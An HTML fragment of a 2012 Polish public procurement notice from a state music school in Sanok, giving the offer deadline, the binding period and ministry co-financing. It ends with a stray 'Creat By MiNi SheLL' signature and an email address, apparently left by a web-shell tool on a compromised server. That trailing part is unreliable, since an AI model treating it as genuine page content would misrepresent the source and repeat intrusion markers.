ul. Podgórze 25, 38-500 Sanok - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 12:00, miejsce: Państwowa Szkoła Muzyczna I i II st. im. Wandy Kossakowej w Sanoku
ul. Podgórze 25, 38-500 Sanok - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DOFINANSOWANO ZE ŚRODKÓW MINISTRA KULTURY I DZIEDZICTWA NARODOWEGO.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com